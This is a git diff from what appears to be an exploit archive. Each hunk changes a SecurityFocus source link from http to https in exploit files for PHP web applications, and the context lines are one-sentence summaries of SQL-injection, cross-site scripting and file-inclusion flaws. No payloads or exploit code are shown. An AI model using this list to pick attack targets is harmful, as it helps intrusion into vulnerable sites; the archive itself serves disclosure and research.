-1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20874/info +source: https://www.securityfocus.com/bid/20874/info RunCMS is prone to an arbitrary file-upload vulnerability. diff --git a/exploits/php/webapps/28898.txt b/exploits/php/webapps/28898.txt index 2ad10e0cb..b4212cdc2 100644 --- a/exploits/php/webapps/28898.txt +++ b/exploits/php/webapps/28898.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20887/info +source: https://www.securityfocus.com/bid/20887/info FreeWebShop is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/php/webapps/28899.txt b/exploits/php/webapps/28899.txt index 9dae795a3..bd87cd4cd 100644 --- a/exploits/php/webapps/28899.txt +++ b/exploits/php/webapps/28899.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20893/info +source: https://www.securityfocus.com/bid/20893/info NewP News Publishing system is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28900.txt b/exploits/php/webapps/28900.txt index 51b5362da..319764335 100644 --- a/exploits/php/webapps/28900.txt +++ b/exploits/php/webapps/28900.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20895/info +source: https://www.securityfocus.com/bid/20895/info Mobile is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28901.txt b/exploits/php/webapps/28901.txt index a47e39f66..29893ab88 100644 --- a/exploits/php/webapps/28901.txt +++ b/exploits/php/webapps/28901.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20895/info +source: https://www.securityfocus.com/bid/20895/info Mobile is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28902.txt b/exploits/php/webapps/28902.txt index 6b06e6747..89a3a47ec 100644 --- a/exploits/php/webapps/28902.txt +++ b/exploits/php/webapps/28902.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20895/info +source: https://www.securityfocus.com/bid/20895/info Mobile is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28903.txt b/exploits/php/webapps/28903.txt index 7da1b8553..5fbf17bc4 100644 --- a/exploits/php/webapps/28903.txt +++ b/exploits/php/webapps/28903.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20895/info +source: https://www.securityfocus.com/bid/20895/info Mobile is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28904.txt b/exploits/php/webapps/28904.txt index ca65b08f9..f532936d2 100644 --- a/exploits/php/webapps/28904.txt +++ b/exploits/php/webapps/28904.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20895/info +source: https://www.securityfocus.com/bid/20895/info Mobile is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28905.txt b/exploits/php/webapps/28905.txt index b11a2f99c..a6a8a6c27 100644 --- a/exploits/php/webapps/28905.txt +++ b/exploits/php/webapps/28905.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20895/info +source: https://www.securityfocus.com/bid/20895/info Mobile is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28906.txt b/exploits/php/webapps/28906.txt index 8fcb19200..a5a63e667 100644 --- a/exploits/php/webapps/28906.txt +++ b/exploits/php/webapps/28906.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20899/info +source: https://www.securityfocus.com/bid/20899/info Simplog is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/28907.txt b/exploits/php/webapps/28907.txt index 89113e632..1670c4fea 100644 --- a/exploits/php/webapps/28907.txt +++ b/exploits/php/webapps/28907.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20900/info +source: https://www.securityfocus.com/bid/20900/info Simplog is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28908.txt b/exploits/php/webapps/28908.txt index 1939b1716..a62cde2bf 100644 --- a/exploits/php/webapps/28908.txt +++ b/exploits/php/webapps/28908.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20902/info +source: https://www.securityfocus.com/bid/20902/info Advanced GuestBook for phpBB is prone to a remote file-include vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28909.txt b/exploits/php/webapps/28909.txt index 3807210e3..c2eb80405 100644 --- a/exploits/php/webapps/28909.txt +++ b/exploits/php/webapps/28909.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20909/info +source: https://www.securityfocus.com/bid/20909/info IF-CMS is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28910.pl b/exploits/php/webapps/28910.pl index d596adeaf..3c755edb3 100755 --- a/exploits/php/webapps/28910.pl +++ b/exploits/php/webapps/28910.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20911/info +source: https://www.securityfocus.com/bid/20911/info PHPKIT is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/28913.txt b/exploits/php/webapps/28913.txt index 85b495531..15d652376 100644 --- a/exploits/php/webapps/28913.txt +++ b/exploits/php/webapps/28913.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20925/info +source: https://www.securityfocus.com/bid/20925/info The '@cid stats' program is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28914.txt b/exploits/php/webapps/28914.txt index 4e1eab972..ef9d6081d 100644 --- a/exploits/php/webapps/28914.txt +++ b/exploits/php/webapps/28914.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20927/info +source: https://www.securityfocus.com/bid/20927/info Xoops is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28917.txt b/exploits/php/webapps/28917.txt index 1104fe66c..7997ac47c 100644 --- a/exploits/php/webapps/28917.txt +++ b/exploits/php/webapps/28917.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20931/info +source: https://www.securityfocus.com/bid/20931/info All In One Control Panel (AIOCP) is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/28918.txt b/exploits/php/webapps/28918.txt index eef352f2b..b7d5bffad 100644 --- a/exploits/php/webapps/28918.txt +++ b/exploits/php/webapps/28918.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20931/info +source: https://www.securityfocus.com/bid/20931/info All In One Control Panel (AIOCP) is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/28919.txt b/exploits/php/webapps/28919.txt index 97591510a..9e6d4f3c8 100644 --- a/exploits/php/webapps/28919.txt +++ b/exploits/php/webapps/28919.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20931/info +source: https://www.securityfocus.com/bid/20931/info All In One Control Panel (AIOCP) is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/28920.txt b/exploits/php/webapps/28920.txt index ed8a97b0e..01f668787 100644 --- a/exploits/php/webapps/28920.txt +++ b/exploits/php/webapps/28920.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20931/info +source: https://www.securityfocus.com/bid/20931/info All In One Control Panel (AIOCP) is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/28921.txt b/exploits/php/webapps/28921.txt index c670f0473..a2951822c 100644 --- a/exploits/php/webapps/28921.txt +++ b/exploits/php/webapps/28921.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20931/info +source: https://www.securityfocus.com/bid/20931/info All In One Control Panel (AIOCP) is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/28922.txt b/exploits/php/webapps/28922.txt index f749876c8..f5a9881e7 100644 --- a/exploits/php/webapps/28922.txt +++ b/exploits/php/webapps/28922.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20931/info +source: https://www.securityfocus.com/bid/20931/info All In One Control Panel (AIOCP) is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/28923.txt b/exploits/php/webapps/28923.txt index 906847561..bf4a31c4f 100644 --- a/exploits/php/webapps/28923.txt +++ b/exploits/php/webapps/28923.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20931/info +source: https://www.securityfocus.com/bid/20931/info All In One Control Panel (AIOCP) is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/28924.txt b/exploits/php/webapps/28924.txt index b8a3fde3f..eee02e9f9 100644 --- a/exploits/php/webapps/28924.txt +++ b/exploits/php/webapps/28924.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20931/info +source: https://www.securityfocus.com/bid/20931/info All In One Control Panel (AIOCP) is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/28925.txt b/exploits/php/webapps/28925.txt index 3030024af..fc6dc64cc 100644 --- a/exploits/php/webapps/28925.txt +++ b/exploits/php/webapps/28925.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20931/info +source: https://www.securityfocus.com/bid/20931/info All In One Control Panel (AIOCP) is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/28926.txt b/exploits/php/webapps/28926.txt index d5210c5d4..8dc82a111 100644 --- a/exploits/php/webapps/28926.txt +++ b/exploits/php/webapps/28926.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20931/info +source: https://www.securityfocus.com/bid/20931/info All In One Control Panel (AIOCP) is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/28927.txt b/exploits/php/webapps/28927.txt index 5c0dc74eb..81f7f648c 100644 --- a/exploits/php/webapps/28927.txt +++ b/exploits/php/webapps/28927.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20931/info +source: https://www.securityfocus.com/bid/20931/info All In One Control Panel (AIOCP) is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/28928.txt b/exploits/php/webapps/28928.txt index c359afdab..e8923bcdb 100644 --- a/exploits/php/webapps/28928.txt +++ b/exploits/php/webapps/28928.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20931/info +source: https://www.securityfocus.com/bid/20931/info All In One Control Panel (AIOCP) is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/28929.txt b/exploits/php/webapps/28929.txt index 74acc996e..c78d388ae 100644 --- a/exploits/php/webapps/28929.txt +++ b/exploits/php/webapps/28929.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20931/info +source: https://www.securityfocus.com/bid/20931/info All In One Control Panel (AIOCP) is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/28930.txt b/exploits/php/webapps/28930.txt index 6acac6036..85735f867 100644 --- a/exploits/php/webapps/28930.txt +++ b/exploits/php/webapps/28930.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20931/info +source: https://www.securityfocus.com/bid/20931/info All In One Control Panel (AIOCP) is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/28931.txt b/exploits/php/webapps/28931.txt index 2e3e22899..372cf0a0f 100644 --- a/exploits/php/webapps/28931.txt +++ b/exploits/php/webapps/28931.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20931/info +source: https://www.securityfocus.com/bid/20931/info All In One Control Panel (AIOCP) is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/28932.txt b/exploits/php/webapps/28932.txt index cbd4dbf35..894189309 100644 --- a/exploits/php/webapps/28932.txt +++ b/exploits/php/webapps/28932.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20931/info +source: https://www.securityfocus.com/bid/20931/info All In One Control Panel (AIOCP) is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/28933.txt b/exploits/php/webapps/28933.txt index ba67a429b..bc1d30b23 100644 --- a/exploits/php/webapps/28933.txt +++ b/exploits/php/webapps/28933.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20931/info +source: https://www.securityfocus.com/bid/20931/info All In One Control Panel (AIOCP) is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/28934.txt b/exploits/php/webapps/28934.txt index c321a0d4e..f246a9b17 100644 --- a/exploits/php/webapps/28934.txt +++ b/exploits/php/webapps/28934.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20931/info +source: https://www.securityfocus.com/bid/20931/info All In One Control Panel (AIOCP) is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/28935.txt b/exploits/php/webapps/28935.txt index b40b3ae11..dde91ca42 100644 --- a/exploits/php/webapps/28935.txt +++ b/exploits/php/webapps/28935.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20931/info +source: https://www.securityfocus.com/bid/20931/info All In One Control Panel (AIOCP) is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/28936.txt b/exploits/php/webapps/28936.txt index 29de656ad..b32f4b35f 100644 --- a/exploits/php/webapps/28936.txt +++ b/exploits/php/webapps/28936.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20931/info +source: https://www.securityfocus.com/bid/20931/info All In One Control Panel (AIOCP) is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/28937.txt b/exploits/php/webapps/28937.txt index 8d39cdf3d..d0f4194f3 100644 --- a/exploits/php/webapps/28937.txt +++ b/exploits/php/webapps/28937.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20931/info +source: https://www.securityfocus.com/bid/20931/info All In One Control Panel (AIOCP) is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/28938.txt b/exploits/php/webapps/28938.txt index 2a43073fc..40d6ff831 100644 --- a/exploits/php/webapps/28938.txt +++ b/exploits/php/webapps/28938.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20952/info +source: https://www.securityfocus.com/bid/20952/info IpManager is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28939.txt b/exploits/php/webapps/28939.txt index 71645dd45..d7daa1096 100644 --- a/exploits/php/webapps/28939.txt +++ b/exploits/php/webapps/28939.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20954/info +source: https://www.securityfocus.com/bid/20954/info Kayako SupportSuite is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28940.txt b/exploits/php/webapps/28940.txt index dd805ee97..5584e27e5 100644 --- a/exploits/php/webapps/28940.txt +++ b/exploits/php/webapps/28940.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20962/info +source: https://www.securityfocus.com/bid/20962/info phpMyChat is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28942.txt b/exploits/php/webapps/28942.txt index 2dc107c53..3f8534940 100644 --- a/exploits/php/webapps/28942.txt +++ b/exploits/php/webapps/28942.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20969/info +source: https://www.securityfocus.com/bid/20969/info FreeWebShop is prone to multiple input-validation vulnerabilities, including a cross-site scripting issue and a local file-include issue. diff --git a/exploits/php/webapps/28943.txt b/exploits/php/webapps/28943.txt index 2d21fb9cc..1a74de826 100644 --- a/exploits/php/webapps/28943.txt +++ b/exploits/php/webapps/28943.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20969/info +source: https://www.securityfocus.com/bid/20969/info FreeWebShop is prone to multiple input-validation vulnerabilities, including a cross-site scripting issue and a local file-include issue. diff --git a/exploits/php/webapps/28944.txt b/exploits/php/webapps/28944.txt index 85f57a15c..b46ba0952 100644 --- a/exploits/php/webapps/28944.txt +++ b/exploits/php/webapps/28944.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20970/info +source: https://www.securityfocus.com/bid/20970/info Abarcar Realty Portal is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/28945.txt b/exploits/php/webapps/28945.txt index f2fb58290..525c62ab7 100644 --- a/exploits/php/webapps/28945.txt +++ b/exploits/php/webapps/28945.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20972/info +source: https://www.securityfocus.com/bid/20972/info phpMyChat is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28946.txt b/exploits/php/webapps/28946.txt index 9a11a167f..d7f642114 100644 --- a/exploits/php/webapps/28946.txt +++ b/exploits/php/webapps/28946.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20974/info +source: https://www.securityfocus.com/bid/20974/info Portix-PHP is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/28947.txt b/exploits/php/webapps/28947.txt index 7d1cb5654..c5d6d81bc 100644 --- a/exploits/php/webapps/28947.txt +++ b/exploits/php/webapps/28947.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20976/info +source: https://www.securityfocus.com/bid/20976/info Speedywiki is prone to multiple input-validation vulnerabilities because the application fails to sufficiently sanitize user-supplied input. These issues include an arbitrary file-upload vulnerability and a cross-site scripting vulnerability. diff --git a/exploits/php/webapps/28949.txt b/exploits/php/webapps/28949.txt index 1ddb096ad..2f2f1d59d 100644 --- a/exploits/php/webapps/28949.txt +++ b/exploits/php/webapps/28949.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20988/info +source: https://www.securityfocus.com/bid/20988/info Bitweaver is prone to multiple input-validation vulnerabilities because the application fails to sufficiently sanitize user-supplied input. These issues include multiple HTML-injection issues and multiple SQL-injection issues. diff --git a/exploits/php/webapps/28950.txt b/exploits/php/webapps/28950.txt index b06732b67..98080980c 100644 --- a/exploits/php/webapps/28950.txt +++ b/exploits/php/webapps/28950.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20989/info +source: https://www.securityfocus.com/bid/20989/info LandShop is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/28951.txt b/exploits/php/webapps/28951.txt index 77f670688..28677bf23 100644 --- a/exploits/php/webapps/28951.txt +++ b/exploits/php/webapps/28951.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20989/info +source: https://www.securityfocus.com/bid/20989/info LandShop is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/28952.txt b/exploits/php/webapps/28952.txt index 70e4a1a8c..c65f8a3b2 100644 --- a/exploits/php/webapps/28952.txt +++ b/exploits/php/webapps/28952.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20990/info +source: https://www.securityfocus.com/bid/20990/info Omnistar Article Manager is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/28953.txt b/exploits/php/webapps/28953.txt index 239fe8a2f..5da847854 100644 --- a/exploits/php/webapps/28953.txt +++ b/exploits/php/webapps/28953.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20996/info +source: https://www.securityfocus.com/bid/20996/info Bitweaver is prone to multiple SQL-injection and cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28954.txt b/exploits/php/webapps/28954.txt index c6a80444d..e7564ae47 100644 --- a/exploits/php/webapps/28954.txt +++ b/exploits/php/webapps/28954.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20996/info +source: https://www.securityfocus.com/bid/20996/info Bitweaver is prone to multiple SQL-injection and cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28963.txt b/exploits/php/webapps/28963.txt index 5af48e97b..e89d15319 100644 --- a/exploits/php/webapps/28963.txt +++ b/exploits/php/webapps/28963.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20996/info +source: https://www.securityfocus.com/bid/20996/info Bitweaver is prone to multiple SQL-injection and cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28964.txt b/exploits/php/webapps/28964.txt index b9846c584..54eef8adb 100644 --- a/exploits/php/webapps/28964.txt +++ b/exploits/php/webapps/28964.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20996/info +source: https://www.securityfocus.com/bid/20996/info Bitweaver is prone to multiple SQL-injection and cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28965.txt b/exploits/php/webapps/28965.txt index 9b3ad367a..a076292d8 100644 --- a/exploits/php/webapps/28965.txt +++ b/exploits/php/webapps/28965.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20996/info +source: https://www.securityfocus.com/bid/20996/info Bitweaver is prone to multiple SQL-injection and cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28967.txt b/exploits/php/webapps/28967.txt index 108110d1f..77ca386c4 100644 --- a/exploits/php/webapps/28967.txt +++ b/exploits/php/webapps/28967.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21003/info +source: https://www.securityfocus.com/bid/21003/info Exophpdesk is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28980.txt b/exploits/php/webapps/28980.txt index f3fa4a76d..772a9e7fa 100644 --- a/exploits/php/webapps/28980.txt +++ b/exploits/php/webapps/28980.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21004/info +source: https://www.securityfocus.com/bid/21004/info WordPress is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28982.txt b/exploits/php/webapps/28982.txt index 2ff24ebc7..da29080c3 100644 --- a/exploits/php/webapps/28982.txt +++ b/exploits/php/webapps/28982.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21027/info +source: https://www.securityfocus.com/bid/21027/info cPanel is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28983.txt b/exploits/php/webapps/28983.txt index 7b010ce69..f3f22c63a 100644 --- a/exploits/php/webapps/28983.txt +++ b/exploits/php/webapps/28983.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21027/info +source: https://www.securityfocus.com/bid/21027/info cPanel is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28988.txt b/exploits/php/webapps/28988.txt index 77889e881..24277a851 100644 --- a/exploits/php/webapps/28988.txt +++ b/exploits/php/webapps/28988.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21042/info +source: https://www.securityfocus.com/bid/21042/info Roundcube Webmail is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28998.txt b/exploits/php/webapps/28998.txt index d904a02f8..73b58410d 100644 --- a/exploits/php/webapps/28998.txt +++ b/exploits/php/webapps/28998.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21047/info +source: https://www.securityfocus.com/bid/21047/info Phpdebug is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28999.txt b/exploits/php/webapps/28999.txt index bd6146ff8..069c0c767 100644 --- a/exploits/php/webapps/28999.txt +++ b/exploits/php/webapps/28999.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21049/info +source: https://www.securityfocus.com/bid/21049/info DirectAdmin is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29000.txt b/exploits/php/webapps/29000.txt index 1121ba5e0..22505efc2 100644 --- a/exploits/php/webapps/29000.txt +++ b/exploits/php/webapps/29000.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21049/info +source: https://www.securityfocus.com/bid/21049/info   DirectAdmin is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.   diff --git a/exploits/php/webapps/29001.txt b/exploits/php/webapps/29001.txt index e22aac401..a4ba35c47 100644 --- a/exploits/php/webapps/29001.txt +++ b/exploits/php/webapps/29001.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21049/info +source: https://www.securityfocus.com/bid/21049/info DirectAdmin is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29002.txt b/exploits/php/webapps/29002.txt index fb3cbad39..b4d0c0ec3 100644 --- a/exploits/php/webapps/29002.txt +++ b/exploits/php/webapps/29002.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21049/info +source: https://www.securityfocus.com/bid/21049/info DirectAdmin is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29003.txt b/exploits/php/webapps/29003.txt index bfd212602..062e156fa 100644 --- a/exploits/php/webapps/29003.txt +++ b/exploits/php/webapps/29003.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21049/info +source: https://www.securityfocus.com/bid/21049/info DirectAdmin is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29004.txt b/exploits/php/webapps/29004.txt index 2f302ee68..69f588756 100644 --- a/exploits/php/webapps/29004.txt +++ b/exploits/php/webapps/29004.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21049/info +source: https://www.securityfocus.com/bid/21049/info DirectAdmin is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29005.txt b/exploits/php/webapps/29005.txt index c69b163cd..279157c7a 100644 --- a/exploits/php/webapps/29005.txt +++ b/exploits/php/webapps/29005.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21049/info +source: https://www.securityfocus.com/bid/21049/info DirectAdmin is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29006.txt b/exploits/php/webapps/29006.txt index b45fd6305..0c117523c 100644 --- a/exploits/php/webapps/29006.txt +++ b/exploits/php/webapps/29006.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21049/info +source: https://www.securityfocus.com/bid/21049/info DirectAdmin is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29017.txt b/exploits/php/webapps/29017.txt index 7fc0f4af0..6505f8323 100644 --- a/exploits/php/webapps/29017.txt +++ b/exploits/php/webapps/29017.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21067/info +source: https://www.securityfocus.com/bid/21067/info Plesk is prone to multiple HTML-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/29018.txt b/exploits/php/webapps/29018.txt index c0e46a84e..170fe2254 100644 --- a/exploits/php/webapps/29018.txt +++ b/exploits/php/webapps/29018.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21067/info +source: https://www.securityfocus.com/bid/21067/info Plesk is prone to multiple HTML-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/29026.txt b/exploits/php/webapps/29026.txt index 72491cf59..8f4aadb5f 100644 --- a/exploits/php/webapps/29026.txt +++ b/exploits/php/webapps/29026.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21072/info +source: https://www.securityfocus.com/bid/21072/info Megamail is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/php/webapps/29027.txt b/exploits/php/webapps/29027.txt index ff8eeb364..bef081e4e 100644 --- a/exploits/php/webapps/29027.txt +++ b/exploits/php/webapps/29027.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21072/info +source: https://www.securityfocus.com/bid/21072/info Megamail is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/php/webapps/29047.txt b/exploits/php/webapps/29047.txt index 1caae0f06..9c610dd48 100644 --- a/exploits/php/webapps/29047.txt +++ b/exploits/php/webapps/29047.txt @@ -1,4 